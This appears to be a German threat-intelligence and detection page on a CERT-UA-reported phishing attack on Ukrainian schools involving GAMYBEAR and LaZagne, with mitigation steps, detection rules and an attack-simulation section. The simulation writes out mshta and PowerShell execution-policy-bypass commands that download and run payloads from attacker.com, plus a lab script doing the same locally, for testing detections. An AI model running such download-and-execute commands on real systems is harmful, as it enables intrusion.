Gezielter Cyberangriff auf eine Schule im Osten der Ukraine mit dem GAMYBEAR-Werkzeug (CERT-UA#18329)
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Eine Kampagne zum Sammeln von Zugangsdaten traf Schulen und öffentliche Behörden in der Region Sumy durch eine Phishing-E-Mail mit einem ZIP-Anhang. Beim Öffnen des Archivs wurde eine HTA-Datei über das mshta Dienstprogramm ausgelöst, die dann PowerShell-Skripte herunterlud, um das GAMYBEAR-Backdoor und den LaZagne-Credential-Dumper bereitzustellen, eine HTTP-basierte C2-Verbindung herzustellen und Dateien aus Zielverzeichnissen zu exfiltrieren.
Angriffsanalyse
CERT-UA verknüpfte den ersten Einbruch mit einer Phishing-Nachricht, die am 26. Mai 2025 von einem gekaperten Gmail-Konto gesendet wurde, und stellte die Details der Kampagne im CERT-UA#18329-Alert bereit. Die forensische Analyse deckte eine mehrstufige Infektionskette auf: ZIP → HTA → update.js → PowerShell → GAMYBEAR begleitet von LaZagne-Malware, wobei die Persistenz über einen Run-Registry-Eintrag und wiederkehrende Downloads von bösartigen URLs aufrechterhalten wurde.
Minderung
Erzwingen Sie die Multi-Faktor-Authentifizierung für alle E-Mail-Konten, blockieren Sie die Ausführung von HTA- und nicht vertrauenswürdigen PowerShell-Skripten, sperren Sie den Registry-Run-Schlüssel und implementieren Sie eine Anwendungs-Whitelist. Aktualisieren Sie kontinuierlich Endpunkterkennungsregeln, um die referenzierten Dateinamen, Hashes und Netzindikatoren zu erkennen.
Reaktion
Isolieren Sie unverzüglich betroffene Endpunkte, setzen Sie die kompromittierten Gmail-Anmeldedaten zurück, sammeln Sie alle identifizierten IOCs und führen Sie umfassende Scans nach GAMYBEAR, LaZagne und verwandten Artefakten durch. Informieren Sie CERT-UA über den Vorfall und verteilen Sie IOCs über relevante Bedrohungsinformationsaustauschkanäle.
Angriffsablauf
Erkennungen
Erkennung der GAMYBEAR C2-Kommunikation [Windows-Netzwerkverbindung]
Ansehen
Erkennung der GAMYBEAR-Backdoor-Ausführung [Windows-Datei-Event]
Ansehen
Erkennung der mshta.exe- und PowerShell-Ausführung mit Bypass [Windows-Prozesserstellung]
Ansehen
IOCs (HashSha1) um zu erkennen: Cyberangriff auf eine Bildungseinrichtung in der Ostukraine, bei dem das GAMYBEAR-Werkzeug verwendet wurde (CERT-UA#18329)
Ansehen
IOCs (DestinationIP) um zu erkennen: Cyberangriff auf eine Bildungseinrichtung in der Ostukraine unter Verwendung des GAMYBEAR-Werkzeuges (CERT-UA#18329)
Ansehen
Simulationen
Simulationsausführung
Voraussetzung: Der Telemetrie- & Baseline-Pre-Flight-Check muss bestanden sein.
Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der durch die Erkennungsregel zu triggernden Gegnertechnik (TTP). Die Befehle und Erzählung MÜSSEN die identifizierten TTPs direkt widerspiegeln und zielen darauf ab, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird.
-
Angriffsnarrativ & Befehle:
-
Stufe 1 – Bösartige HTA einsetzen: Der Angreifer hostet
evil.htaauf einem kompromittierten Webserver. -
Stufe 2 – Ausführen via
mshta.exe: Mit einem Windows-Befehlszeilenfenster führt der Angreifer ausmshta.exe http://attacker.com/evil.hta. Dies erzeugt ein Prozesserstellungsereignis mitmshta.exein der Befehlszeile, das die erste Bedingung der Regel erfüllt. -
Stufe 3 – PowerShell-Umgehung: Um eine Nutzlast auszuführen, die die Ausführungsrichtlinie des Systems umgeht, startet der Angreifer PowerShell mit dem
-ep bypass-Flagge:PowerShell -ep bypass -Command "Invoke-WebRequest http://attacker.com/payload.ps1 -OutFile $env:TEMPp.ps1; & $env:TEMPp.ps1"Dies erzeugt ein zweites Prozesserstellungsereignis, das den genauen String
PowerShell -ep bypassenthält, was die zweite Bedingung erfüllt.
-
-
Regressionstest-Skript: Das folgende PowerShell-Skript reproduziert die obigen Schritte auf automatisierte, wiederholbare Weise.
# ------------------------------------------------- # Regressionstest – Sigma-Regel für mshta & PowerShell -ep bypass auslösen # ------------------------------------------------- # Variablen – an Ihre Lab-Umgebung anpassen $htaUrl = "http://127.0.0.1/evil.hta" # Muss auf eine erreichbare HTA-Datei verweisen $psUrl = "http://127.0.0.1/payload.ps1" # Einfaches PS-Payload (z.B., `Write-Host "pwned"`) # 1. mshta.exe aufrufen Write-Host "[*] mshta.exe wird gegen $htaUrl gestartet" Start-Process -FilePath "mshta.exe" -ArgumentList $htaUrl -NoNewWindow # Kurze Pause, um sicherzustellen, dass der Prozess protokolliert wird Start-Sleep -Seconds 2 # 2. PowerShell mit Ausführungsrichtlinienumgehung aufrufen $psCmd = "Invoke-WebRequest $psUrl -UseBasicParsing -OutFile $env:TEMPp.ps1; & $env:TEMPp.ps1" Write-Host "[*] PowerShell -ep bypass wird gestartet" Start-Process -FilePath "powershell.exe" -ArgumentList "-ep bypass -Command `"$psCmd`"" -NoNewWindow # Pause, um Protokollierung zu ermöglichen Start-Sleep -Seconds 5 Write-Host "[+] Test abgeschlossen. Überprüfen Sie Ihr SIEM auf Alarme." -
Bereinigungskommandos: Entfernen Sie temporäre Dateien und beenden Sie alle verbleibenden Testprozesse.
# Temporäres Payload bereinigen Remove-Item -Path "$env:TEMPp.ps1" -ErrorAction SilentlyContinue # Optional verbleibende mshta- oder PowerShell-Instanzen, die durch den Test entstehen, beenden Get-Process -Name mshta, powershell -ErrorAction SilentlyContinue | Where-Object { $_.Id -ne $PID } | Stop-Process -Force